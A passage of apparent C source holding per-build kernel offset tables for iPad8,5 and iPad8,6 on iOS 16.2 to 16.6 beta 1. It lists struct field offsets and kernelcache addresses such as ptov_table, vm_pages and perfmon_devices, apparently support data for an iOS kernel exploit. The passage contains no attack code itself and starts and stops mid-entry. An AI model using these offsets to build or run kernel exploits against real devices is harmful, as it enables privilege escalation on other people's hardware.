.kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,5", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,5", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,6 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,6", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,6", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 